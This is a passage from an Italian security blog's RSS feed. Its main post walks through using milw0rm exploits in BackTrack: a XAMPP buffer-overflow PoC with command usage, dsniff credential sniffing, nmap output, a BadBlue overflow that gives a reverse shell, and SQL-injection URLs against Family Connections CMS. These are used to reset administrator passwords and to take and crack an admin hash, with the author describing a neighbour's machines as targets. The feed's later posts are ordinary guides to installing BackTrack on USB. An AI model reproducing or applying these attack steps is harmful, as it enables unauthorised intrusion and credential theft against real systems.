<p><span style="color:#ff0000;">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
XAMPP for Windows &lt;= 1.6.0a adodb.php/mssql_connect() remote buffer overflow<br />
proof-of-concept exploit<br />
seh overwrite method / 2000 sp3 version<br />
mail: retrog at alice dot it<br />
site: http://retrogod.altervista.org<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</span></p>
<p><span style="color:#ff0000;">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
Usage: php ./3738.php host cmd OPTIONS<br />
host:      target server (ip/hostname)<br />
cmd:       a shell command<br />
Options:<br />
-p[port]:    specify a port other than 80<br />
-P[ip:port]: specify a proxy<br />
-S           only send the second packet<br />
Example:<br />
php ./3738.php localhost VER -P1.1.1.1:80<br />
php ./3738.php localhost NET USER sun tzu /ADD ^&amp;^&amp; NET LOCALGROUP<br />
Administrators /ADD sun -p81 -S<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</span></p>
<p align="center"><strong>***</strong></p>
<p><strong>C</strong>ome possiamo vedere dalla lista di informazioni che ci viene restituita all&#8217; interno della nostra shell , l&#8217; exploit per essere eseguito necessita di alcune informazioni. Ogni exploit per essere eseguito necessita di informazioni diverse , ci sono exploit compilati e da compilare , e tutti sono eseguibili con successo , naturalmente , solo se il sistema vittima è affetto dalla vulnerabilità che l&#8217; exploit andrà ad usare lo <strong>Xampp</strong> deve essere alla versione <strong>&lt;=1.6.0a </strong>, rigorosamente , come possiamo leggere dalla matrice stessa , per <strong>Windows</strong>.</p>
<p>Vediamo ora di eseguire l&#8217; exploit con i dovuti comandi&#8230;</p>
<p><em>Un esempio che ci viene mostrato dall&#8217; exploit è il seguente:</em></p>
<p><span style="color:#ff0000;"> php ./3738.php localhost VER -P1.1.1.1:80</span></p>
<p>Noi , avendo un server su cui provarlo , daremo il seguente comando da konsole:</p>
<p><strong>php ./3738.php 29.230.6.73 net user Administrator komintern</strong></p>
<p>dove:. <strong>net user Administrator komintern </strong>è il comando che verrà eseguito sul server dopo il <strong>BoF</strong> , ovvero il cambio della password dalla precedente a <em><strong>komintern</strong></em> sul sistema del mio vicino di casa con il quale mi trovo nella stessa Lan&#8230;comando che per funzionare , questo va detto , mi ha costretto a modificare varie opzioni nel database e vari files di configurazione del PHP , <strong>php.ini</strong> eccetera.</p>
<p>Una volta cambiata la password dell&#8217; Administrator , apro una sessione <a href="http://it.wikipedia.org/wiki/Telnet"><strong>Telnet</strong></a> e mi connetto al Server con le credenziali create , per mostrarle ho fatto un semplicissimo <strong>sniffing</strong> con <strong>dsniff</strong> sulla mia stessa interfaccia di rete , con il comando:</p>
<p><strong><span style="color:#ff0000;">bt</span> <span style="color:#0000ff;">remote</span></strong><strong><span style="color:#ff0000;"><span style="color:#0000ff;"> </span></span></strong><strong><span style="color:#ff0000;"><span style="color:#0000ff;">#</span></span></strong><strong> dsniff -i ath0</strong></p>
<p>che naturalmente ha funzionato alla perfezione mostrandomi le credenziali di accesso al server ovvero:</p>
<p><span style="color:#ff0000;"><strong>&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
06/30/08 21:32:12 tcp 29.230.6.74.42449 -&gt; 29.230.6.73.23 (telnet)</strong><strong><br />
<span style="color:#ffcc00;">Komintern</span>Administrator<br />
komintern</strong><strong><br />
</strong></span></p>
<p>Aperta la sessione Telnet sono stato in grado di inetragire con tutto il sistema , la maggiorparte delle volte infatti se il servizio Telnet è abilitato , solo l&#8217; Administrator può interagire con il Desktop del sistema , non si lascia interagire un utente &#8220;normale&#8221; o anche del gruppo Administrators&#8230; &#8230;ma questo di solito , poi ognuno configura la propria rete come vuole.</p>
<p>Il giallo sta a rappresentare un semplice errore di sniffing di dsniff , perchè volendo copiare la parola komintern senza doverla digitare in seguito , e come potete vedere dal video lo username è stato unicamente <strong>Administrator</strong> , provando a dare meglio l&#8217; idea <strong>dsniff</strong> ha raccolto le credenziali in modo totale , senza che poi il login abbia o no avuto successo.</p>
<p>È ovvio che ho preso il caso dello xampp perché volevo realizzarci un video e fare una piccola dimostrazione , ma se ci saremmo dovuti occupare di fare pentesting su di un server esterno le cose non sarebbero cambiate di molto , ad ogni versione di <strong>MySQL</strong> , di <strong>PHP</strong> di <strong>CMS</strong> eccetera , corrispondono delle vulnerabilità e degli exploits , e con l&#8217; archivio di Milw0rm nella nostra <strong>BackTrack</strong> , abbiamo la possibilità di effettuare tutti i test che vogliamo. La maggiorparte delle volte che si sente parlare di siti che pubblicano exploits in &#8220;malomodo&#8221; , succede per il semplice fatto che chi fa danni , al 99% dei casi non va a scegliersi un obbiettivo da attaccare , che sarebbe a mio modo di vedere la cosa , <span style="text-decoration:underline;">sempre male </span>ma che dimostra capacità , ma lo fà andando in giro per <strong>dork</strong> , ovvero trovare in <strong>google</strong> tutti i siti vulnerabili per poi prendere il primo che capita e fare il danno&#8230; &#8230;cosa che , a quanto pare , rende più famosi , ma molto semplice ed inutile.</p>
<p style="text-align:center;">***</p>
<p>Andiamo adesso ad effettuare il nostro pentesting contro un sistema che ha come OS WindowsXpPro , nel video la prima demo.</p>
<p>facciamo una scansione delle porte tramite <strong>nMap</strong> , e vediamone il risultato&#8230;</p>
<p style="text-align:center;"><strong>***</strong></p>
<p><span style="color:#ff0000;"><strong>bt <span style="color:#0000ff;">~ #</span></strong> </span><strong>nmap -sS -sV -T Aggressive 29.230.6.73 -v</strong></p>
<p><span style="color:#ff0000;">Starting Nmap 4.50 ( http://insecure.org ) at 2008-05-16 11:18 GMT<br />
Initiating ARP Ping Scan at 11:18<br />
Scanning 29.230.6.73 [1 port]<br />
Completed ARP Ping Scan at 11:18, 0.01s elapsed (1 total hosts)<br />
Initiating Parallel DNS resolution of 1 host. at 11:18<br />
Completed Parallel DNS resolution of 1 host. at 11:18, 0.05s elapsed<br />
Initiating SYN Stealth Scan at 11:18<br />
Scanning 29.230.6.73 [1711 ports]<br />
Discovered open port 81/tcp on 29.230.6.73<br />
Discovered open port 139/tcp on 29.230.6.73<br />
Discovered open port 912/tcp on 29.230.6.73<br />
Discovered open port 445/tcp on 29.230.6.73<br />
Discovered open port 135/tcp on 29.230.6.73<br />
Discovered open port 4662/tcp on 29.230.6.73<br />
Completed SYN Stealth Scan at 11:19, 7.24s elapsed (1711 total ports)<br />
Initiating Service scan at 11:19<br />
Scanning 6 services on 29.230.6.73<br />
Completed Service scan at 11:19, 11.07s elapsed (6 services on 1 host)<br />
SCRIPT ENGINE: Initiating script scanning.<br />
Initiating SCRIPT ENGINE at 11:19<br />
Completed SCRIPT ENGINE at 11:19, 0.21s elapsed<br />
Host 29.230.6.73 appears to be up &#8230; good.<br />
Interesting ports on 29.230.6.73:<br />
Not shown: 1705 filtered ports<br />
PORT     STATE SERVICE      VERSION<br />
81/tcp   open  http         BadBlue httpd 2.7<br />
135/tcp  open  msrpc        Microsoft Windows RPC<br />
139/tcp  open  netbios-ssn<br />
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds<br />
912/tcp  open  ftp          vsftpd or WU-FTPD<br />
4662/tcp open  edonkey?<br />
MAC Address: 00:13:8F:EB:1D:DD (Asiarock Incorporation)<br />
Service Info: OS: Windows</span></p>
<p><span style="color:#ff0000;">Host script results:<br />
|_ Discover OS Version over NetBIOS and SMB: Windows XP</span></p>
<p><span style="color:#ff0000;">Read data files from: /usr/local/share/nmap<br />
Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .<br />
Nmap done: 1 IP address (1 host up) scanned in 18.845 seconds<br />
Raw packets sent: 3417 (150.346KB) | Rcvd: 7 (318B)</span></p>
<p style="text-align:center;"><strong>***</strong></p>
<p>bene , come possiamo vedere sul sistema &#8220;vittima&#8221; ci sono , oltre a delle porte aperte che potrebbero essere sfruttate in altro modo , delle informazioni che possono esserci molto preziose , infatti dalle ultime righe possiamo benissimo leggere:</p>
<p style="text-align:center;"><strong>***</strong></p>
<p><strong><span style="color:#ff0000;">PORT     STATE SERVICE      VERSION<br />
81/tcp   open  http         BadBlue httpd 2.7</span></strong></p>
<p style="text-align:center;"><strong>***</strong></p>
<p>Sulla porta 80 quindi c&#8217;é in esecuzione il <strong>BadBlue</strong> , alla versione <strong>2.7</strong>.</p>
<p>Il BadBlue è un webserver che permette di poter condividere , pubblicamente o no , tutti i files , documenti , foto eccetera.</p>
<p>Il BadBlue a questa versione , che nMap ci ha restituito , contiene però una vulnerabilità che è molto grave come falla e ci permette di penetrare il sistema e dopo aver causato un <strong>BufferOverFlow</strong> ci permette anche di ottenere una <strong>reverse shell </strong>, i comandi , <strong>shellcode</strong> compreso , sono già tutti contenuti all&#8217; interno dell&#8217; exploit.</p>
<p>potete vedere benissimo dal video che non solo sono penetrato , grazie all&#8217; exploit , all&#8217; interno del sistema , ma ho anche cambiato la password dell&#8217; amministratore del sistema stesso con il seguente comando:</p>
<p><strong>net user KaB0T  brigante</strong></p>
<p><strong><span style="color:#ff0000;">C:\&gt; </span>net user </strong><strong><span style="color:#0000ff;">KaB0T</span></strong> <strong>brigante</strong></p>
<p><em>(<span style="text-decoration:underline;">KaB0T</span> è il nome di un mio vicino di casa con il quale mi condivido spesso la connessione&#8230;)</em></p>
<p>Il terzo ed ultimo esempio di pentesting , nel video seconda demo , con exploits targati milw0rm l&#8217; ho fatto con una semplicissima <strong>SQL-Injection</strong>&#8230;   &#8230;semplicissima per chi la usa , come nel nostro caso , ma per realizzare l&#8217; exploit non è così semplice.</p>
<p>La SQL-Injection che ho usato per questo test va a colpire una vulnerabilità insita nel <strong>CMS-Family Connection</strong> , alla versione <strong>1.4</strong>.</p>
<p>sempre con la stessa procedura , mi sono spostato nella directory giusta&#8230;</p>
<p><span style="color:#ff0000;"><strong>bt <span style="color:#0000ff;">~ # </span></strong></span><strong>cd /pentest/exploits/milw0rm/</strong></p>
<p>ed ho raccolto i possibili risultati dall&#8217; archivio con il comando <strong>grep</strong>:</p>
<p><span style="color:#ff0000;"><strong>bt <span style="color:#0000ff;">milw0rm # </span></strong></span><strong>grep Family sploitlist-bt.txt</strong></p>
<p><span style="text-decoration:underline;"><em>e questo è stato il risultato:</em></span></p>
<p><strong><span style="color:#ff0000;">./platforms/php/remote/892.txt phpMyFamily &lt;= 1.4.0 Admin Bypass SQL Injection<br />
./platforms/php/remote/1208.pl phpMyFamily &lt;= 1.4.0 SQL Injection Exploit<br />
./platforms/php/remote/5811.txt Family Connections CMS 1.4 Multiple Remote SQL Injection Vulnerability</span></strong></p>
<p style="text-align:center;">***</p>
<p style="text-align:left;">Ottenuto il risultato per il<strong> FamilyConnection-CMS</strong> cui mi trovavo davanti , sono andato nella directory giusta:</p>
<p style="text-align:left;"><span style="color:#ff0000;"><strong>bt <span style="color:#0000ff;">milw0rm #</span></strong></span> <strong>cd platforms/php/remote/</strong></p>
<p style="text-align:left;">dopodiché essendo un file <strong>*.txt</strong> potevo aprirlo come volevo , con <strong>nano</strong> , <strong>vim</strong> , <strong>kate</strong> , visto che non finisce in <strong>shell</strong> come i precedenti due esempi l&#8217; ho aperto con lo <strong>Scintilla</strong>&#8230;  &#8230;lo <strong>SciTE</strong> , editor adattabile a molti linguaggi di progrmmaione compreso in <strong>BackTrack</strong> di prima installazione , quindi:</p>
<p style="text-align:left;"><span style="color:#ff0000;"><strong>bt <span style="color:#0000ff;">remote # </span></strong></span><strong>SciTE 5811.txt</strong></p>
<p style="text-align:left;">aperto il file <strong>*.txt</strong> ho letto le seguenti indicazioni:</p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:left;">First you must register for access to user section then SQL Injection Exploit !!!</p>
<p>&#8212;&#8212;&#8212;-<br />
<strong>Exploits</strong><br />
&#8212;&#8212;&#8212;-<br />
<strong>[+]</strong> /addressbook.php?address=<strong>&lt;SQL Injection&gt;</strong><br />
<strong>[+]</strong> /familynews.php?getnews=<strong>&lt;SQL Injection&gt;&amp;newsid=2</strong><br />
<strong>[+]</strong> /home.php?action=results&amp;poll_id=<strong>&lt;SQL Injection&gt;</strong></p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:left;">dopodiché ho eseguito l&#8217; Injection ed ho ottenuto le credenziali di accesso dell&#8217; amministratore del sito , ovvero:</p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:center;"><span style="text-decoration:underline;"><strong>admin : 6970ff8bb08f3c1bde2f49c608ac4b21</strong></span></p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:left;">Una volta preso l hash dell&#8217; admin , vado direttamente sul sito di <strong>milw0rm.com</strong> sul link <strong>cracker</strong> e inserisco l hash selezionando naturalmente come opzione di criptatura <strong>md5</strong> , aspetto non molto , visto che già l&#8217; avevo fatta prima l&#8217; operazione e ottengo la password con la quale in seguito effettuo l&#8217; accesso al CMS come amministratore.</p>
<p style="text-align:left;">Naturalmente avrei potuto fare anche una prova con<strong> John The Ripper</strong> o altre soluzioni <strong>OFF-Line</strong> inserite in BackTrack , ma parlando dell&#8217; archivio degli exploits di milw0rm.com ho ritenuto migliore soluzione lavorare con lo stesso cracker di milw0rm , oltretutto in questo modo si contribuisce ad aggiungere un altro hash crackato , sperando sempre che non finisca nelle mani sbagliate.</p>
<p>Questa è solo una semplicissima dimostrazione di come è possibile fare pentesting con estrema facilità e nel minor tempo possibile , del resto da un&#8217; accoppiata come <span style="text-decoration:underline;"><strong>Milw0rm &amp; BackTrack</strong></span> ci si può aspettare solo il top.</p>
<p>Spero di essere stato abbastanza chiaro , per ogni cosa nella pagina <strong>/video</strong> c&#8217;é il videotutorial di questo  How-To&#8230; per ogni chiarimento siamo in <strong>canale</strong> e in <strong>mailinglist</strong>.</p>
<p>I commenti quì nel blog cortesemente , usateli come comnmenti , non come help-desk.</p>
<p>Ciao a tutti e alla prossima.</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/carlitobrigante.wordpress.com/517/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/carlitobrigante.wordpress.com/517/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/carlitobrigante.wordpress.com/517/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/carlitobrigante.wordpress.com/517/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/carlitobrigante.wordpress.com/517/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/carlitobrigante.wordpress.com/517/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/carlitobrigante.wordpress.com/517/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/carlitobrigante.wordpress.com/517/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/carlitobrigante.wordpress.com/517/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/carlitobrigante.wordpress.com/517/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/carlitobrigante.wordpress.com/517/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/carlitobrigante.wordpress.com/517/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=517&subd=carlitobrigante&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://carlitobrigante.wordpress.com/2008/07/08/backtrack-milw0rm-exploits-archive-video-2/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">~br1g4nt3~</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/02/milw0rm_cracker.jpg" medium="image">
			<media:title type="html">milw0rm_cracker.jpg</media:title>
		</media:content>
	</item>
		<item>
		<title>Installazione di BackTrack-3.final su usb da linux</title>
		<link>http://carlitobrigante.wordpress.com/2008/07/02/installazione-di-backtrack-3final-su-usb-da-linux/</link>
		<comments>http://carlitobrigante.wordpress.com/2008/07/02/installazione-di-backtrack-3final-su-usb-da-linux/#comments</comments>
		<pubDate>Wed, 02 Jul 2008 21:25:47 +0000</pubDate>
		<dc:creator>redbar0n</dc:creator>
				<category><![CDATA[/Installation]]></category>
		<category><![CDATA[/backtrack]]></category>
		<category><![CDATA[final]]></category>
		<category><![CDATA[installazione]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[usb]]></category>

		<guid isPermaLink="false">http://carlitobrigante.wordpress.com/?p=506</guid>
		<description><![CDATA[
Questa è un&#8217;altra guida molto semplice che spiega come installare da linux la nostra copia di BackTrack-3.final su una pen drive USB.
 Ciò di cui abbiamo bisogno è questo:

-Una distribuzione linux per l&#8217;installazione
-La .iso della BackTrack 3 scaricabile dal wiki di Remote-Exploit linkato sul lato destro del nostro blog
-Una pen drive di almeno 1 GB [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=506&subd=carlitobrigante&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><a href="http://carlitobrigante.files.wordpress.com/2008/07/usbdrive.png"><img class="aligncenter size-medium wp-image-510" src="http://carlitobrigante.files.wordpress.com/2008/07/128px-usbdrive_iconsvg1.png?w=128&#038;h=128" alt="" width="128" height="128" /></a></p>
<p>Questa è un&#8217;altra guida molto semplice che spiega come <span style="text-decoration:underline;"><em>installare da linux</em></span> la nostra copia di <span style="text-decoration:underline;"><span style="color:#0000ff;"><strong>BackTrack-3.final</strong></span></span> su una <strong>pen drive</strong> <em><strong>USB</strong></em>.</p>
<p style="text-align:center;"><em><span style="text-decoration:underline;"> Ciò di cui abbiamo bisogno è questo:</span></em></p>
<p><em></em><br />
-Una <em><span style="text-decoration:underline;">distribuzione linux</span></em> per l&#8217;installazione<br />
-La <em><span style="text-decoration:underline;">.iso della BackTrack 3</span></em> scaricabile dal <strong>wiki</strong> di <span style="text-decoration:underline;"><em><span style="color:#0000ff;">Remote-Exploit</span></em></span> linkato sul lato destro del nostro blog<br />
-Una <em><span style="text-decoration:underline;">pen drive</span></em> di almeno <strong>1</strong> <strong>GB</strong> (2 GB raccomandati)<br />
<em><strong></strong></em></p>
<p><span style="text-decoration:underline;"><em><strong>Iniziamo:</strong></em></span></p>
<p><strong>1-</strong><span style="text-decoration:underline;"><em> Scarichiamo</em></span> la nostra copia di <strong><span style="text-decoration:underline;"><span style="color:#0000ff;">Backtrack</span></span></strong> sul nostro pc (la <em><strong>release per usb</strong></em> naturalmente).</p>
<p><strong>2-</strong> Ora creiamo un <em><strong>punto di mount</strong></em> nella nostra cartella <em><strong>/mnt</strong> </em>che ci servirà per fare il mount della nostra .iso:</p>
<p style="text-align:center;">
<p style="text-align:left;"><strong></strong><strong><em><span style="color:#ff0000;"><span style="color:#000000;">%</span>mkdir /mnt/iso</span></em></strong></p>
<p style="text-align:center;">***</p>
<p style="text-align:left;"><strong>3-</strong> Dopo esserci posizionati nella destinazione in cui abbiamo scaricato la nostra <em><strong><span style="text-decoration:underline;"><span style="color:#0000ff;">Backtrack</span></span></strong></em> possiamo fare il <em><strong>mount</strong></em> <em><strong>della</strong></em> <em><strong>iso</strong></em> nella cartella che abbiamo appena creato:</p>
<p style="text-align:center;">
<p style="text-align:left;"><strong><span style="color:#ff0000;"><em><span style="color:#000000;">%</span>mount -o loop -t iso9660 bt3final_usb.iso /mnt/iso</em></span></strong></p>
<p style="text-align:center;">***</p>
<p><strong>4-</strong> Facciamo il mount alla pen drive:</p>
<p style="text-align:center;">
<p style="text-align:left;"><strong><span style="color:#ff0000;"><em><span style="color:#000000;">%</span>mount /dev/sda1 /mnt/pendrive</em></span></strong></p>
<p style="text-align:center;">***</p>
<p style="text-align:center;"><em> <strong>sda1 </strong>corrisponde alla mia pen drive non è detto che a voi sia rilevata nel mio stesso modo; <strong>/mnt/pendrive</strong> è il punto di mount che ho impostato , se a voi è diverso dovete scrivere il vostro </em></p>
<p style="text-align:center;">***</p>
<p><strong>4-</strong> Fatto questo sarà necessario <em>copiare</em> le 2 cartelle che avete creato quindi <strong>boot</strong> e <strong>bt3</strong> situate in <strong>/mnt/iso</strong> nella nostra<strong><span style="text-decoration:underline;"> <em>pen drive</em></span></strong></p>
<p style="text-align:center;"><a href="http://carlitobrigante.files.wordpress.com/2008/07/snapshot3.png"><img class="aligncenter size-medium wp-image-513" src="http://carlitobrigante.files.wordpress.com/2008/07/snapshot3.png?w=300&#038;h=225" alt="" width="300" height="225" /></a></p>
<p style="text-align:center;">***</p>
<p><strong>5-</strong> Ora non ci resta da far altro che rendere <strong><em>bootable</em></strong> la nostra <em>penna usb</em> e lo faremo così:<br />
<em><span style="color:#ff0000;"><strong><span style="color:#000000;">%</span>cd /mnt/pendrive/boot</strong></span></em></p>
<p><em><span style="color:#ff0000;"><strong></strong><br />
<strong><span style="color:#000000;"> %</span>bootinst.sh</strong></span></em></p>
<p style="text-align:center;">***</p>
<p><a href="http://carlitobrigante.files.wordpress.com/2008/07/snapshot11.png"><img class="aligncenter size-medium wp-image-511" src="http://carlitobrigante.files.wordpress.com/2008/07/snapshot11.png?w=300&#038;h=225" alt="" width="300" height="225" /></a></p>
<p style="text-align:center;">***</p>
<p><strong>6-</strong> Diamo conferma con <em><strong>INVIO</strong></em> e facendo il reboot dovrebbe partire <strong><span style="text-decoration:underline;"><span style="color:#0000ff;">BackTrack</span></span></strong> (naturalmente dovete aver precedentemente <em><strong>impostato il vostro Bios per boot da Usb</strong></em>)</p>
<p>Ciao a tutti e alla prossima</p>
<p style="text-align:center;">[edit]</p>
<p>scrivo queste due righe per precisare che la procedura eseguita con la 3.beta a riguardo dei livechenges può essere in egualmodo adattata alla 3.final , quindi chi vuole può far riferimento alla guida<strong> BackTrack tutto dalla 2.final alla 3.beta</strong> , nella sezione <strong>/install</strong>.</p>
<p>Chi invece vuole , sempre da usb , usare la BackTrack-3.final con il metodo descritto per la 2.final , può crearsi delle partizioni e salvarci i cambiamenti secondo il metodo descritto in <a href="http://forums.remote-exploit.org/showthread.php?t=7844" target="_blank"><span style="text-decoration:underline;"><em><strong>questo</strong></em></span></a> post sul forums.remote-exploit.org.</p>
<p style="text-align:center;">[/edit]</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/carlitobrigante.wordpress.com/506/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/carlitobrigante.wordpress.com/506/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/carlitobrigante.wordpress.com/506/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/carlitobrigante.wordpress.com/506/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/carlitobrigante.wordpress.com/506/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/carlitobrigante.wordpress.com/506/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/carlitobrigante.wordpress.com/506/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/carlitobrigante.wordpress.com/506/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/carlitobrigante.wordpress.com/506/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/carlitobrigante.wordpress.com/506/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/carlitobrigante.wordpress.com/506/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/carlitobrigante.wordpress.com/506/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=506&subd=carlitobrigante&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://carlitobrigante.wordpress.com/2008/07/02/installazione-di-backtrack-3final-su-usb-da-linux/feed/</wfw:commentRss>
		<slash:comments>10</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">redbar0n</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/07/128px-usbdrive_iconsvg1.png?w=128" medium="image" />

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/07/snapshot3.png?w=300" medium="image" />

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/07/snapshot11.png?w=300" medium="image" />
	</item>
		<item>
		<title>Installazione di BackTrack-3.final su usb da windows.</title>
		<link>http://carlitobrigante.wordpress.com/2008/07/02/installazione-di-backtrack-3final-su-usb-da-windows/</link>
		<comments>http://carlitobrigante.wordpress.com/2008/07/02/installazione-di-backtrack-3final-su-usb-da-windows/#comments</comments>
		<pubDate>Wed, 02 Jul 2008 06:08:28 +0000</pubDate>
		<dc:creator>redbar0n</dc:creator>
				<category><![CDATA[/Installation]]></category>
		<category><![CDATA[/backtrack]]></category>
		<category><![CDATA[3]]></category>
		<category><![CDATA[final]]></category>
		<category><![CDATA[pendrive]]></category>
		<category><![CDATA[usb]]></category>

		<guid isPermaLink="false">http://carlitobrigante.wordpress.com/?p=479</guid>
		<description><![CDATA[
Questa piccola guida riprende una guida reperibile su internet che tratta dell’installazione su pen drive di una distribuzione knoppix , è stata dunque riadattata per la Backtrack e l&#8217;abbiamo preferita alle altre perché è davvero semplicissima.
Questo è ciò di cui avete bisogno per avere la vostra Backtrack su usb:

- pen drive di almeno 1 GB.
- [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=479&subd=carlitobrigante&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p class="MsoNormal"><a href="http://carlitobrigante.files.wordpress.com/2008/07/eee.png"><img class="aligncenter size-thumbnail wp-image-503" src="http://carlitobrigante.files.wordpress.com/2008/07/eee.png?w=96&#038;h=96" alt="" width="96" height="96" /></a></p>
<p class="MsoNormal">Questa piccola guida riprende una guida reperibile su internet che tratta dell’installazione su pen drive di una distribuzione <strong>knoppix</strong> , è stata dunque riadattata per la <strong><span style="color:#ff0000;"><span style="text-decoration:underline;">Backtrack</span></span></strong> e l&#8217;abbiamo preferita alle altre perché è davvero semplicissima.</p>
<p class="MsoNormal">Questo è ciò di cui avete bisogno per avere la vostra <strong>Backtrack</strong> su usb:</p>
<p class="MsoNormal">
<p class="MsoNormal" style="margin-left:36pt;text-indent:-18pt;"><!--[if !supportLists]--><strong><span>-<span> </span></span>pen drive di almeno 1 GB.</strong><!--[endif]--></p>
<p class="MsoNormal" style="margin-left:36pt;text-indent:-18pt;"><!--[if !supportLists]--><strong><span>-<span> </span></span>un pc con sistema operativo windows installato (xp o vista).</strong><!--[endif]--></p>
<p class="MsoNormal" style="margin-left:36pt;text-indent:-18pt;"><!--[if !supportLists]--><strong><span>-<span> </span></span>la  *.iso (versione apposita per usb) di <span style="text-decoration:underline;">Backtrack 3</span> reperibile dal WiKi </strong>(<em>wallaper di BackTrack 3 a destra della colonna centrale del blog</em>)<!--[endif]--></p>
<p class="MsoNormal" style="margin-left:36pt;text-indent:-18pt;"><!--[if !supportLists]--><strong><span>-<span> </span></span>file fixkp2.exe .</strong><!--[endif]--></p>
<p class="MsoNormal" style="margin-left:36pt;text-indent:-18pt;">
<p class="MsoNormal">
<p class="MsoNormal" style="text-align:center;"><strong><em><span style="text-decoration:underline;">Ora seguite questi passaggi:</span></em></strong></p>
<p class="MsoNormal">
<p class="MsoNormal"><strong>1-</strong>Scaricate il file eseguibile<strong> <span style="color:#0000ff;">fixkp2.exe</span></strong> da questo indirizzo: <a href="http://www.pendrivelinux.com/downloads/fixkp2.exe">http://www.pendrivelinux.com/downloads/fixkp2.exe</a> ed eseguitelo, verrà creata automaticamente una cartella denominata<strong> <span style="color:#0000ff;">USB-Knoppix</span> </strong>nella destinazione che imposterete a vostro piacimento.</p>
<p class="MsoNormal"><strong>2-</strong>Scaricate la <strong>*.iso</strong> di <strong><span style="text-decoration:underline;"><span style="color:#ff0000;">Backtrack</span></span></strong> e spostatela nella cartella precedentemente creata cioè <strong><span style="color:#0000ff;">USB-Knoppix</span></strong>.</p>
<p class="MsoNormal"><strong>3-</strong>Cliccate il file<strong> <span style="color:#0000ff;">fixkp2.bat</span></strong> presente nella cartella <strong><span style="color:#0000ff;">USB-Knoppix</span> </strong>e seguite le istruzioni che vi vengono date. {Dovete inizialmente inserire la lettera corrispondente alla vostra pen drive , <em>(già inserita precedentemente)</em>, poi vi verrà chiesto se siete disposti a formattarla(dovete confermare con &#8216;<strong>y</strong>&#8216;), l&#8217;estrazione e la copia dei files sulla penna avverrà automaticamente, infine vi verrà chiesto se volete rendere bootable la vostra pen drive e voi naturalmente dovete confermare&#8217;<strong>y</strong>&#8216;}.</p>
<p class="MsoNormal" style="text-align:center;">***</p>
<p class="MsoNormal">
<p class="MsoNormal" style="text-align:center;"><a href="http://carlitobrigante.files.wordpress.com/2008/07/immagine104.jpg"><img class="aligncenter size-medium wp-image-495" src="http://carlitobrigante.files.wordpress.com/2008/07/immagine104.jpg?w=300&#038;h=225" alt="" width="300" height="225" /></a></p>
<p class="MsoNormal" style="text-align:center;">***</p>
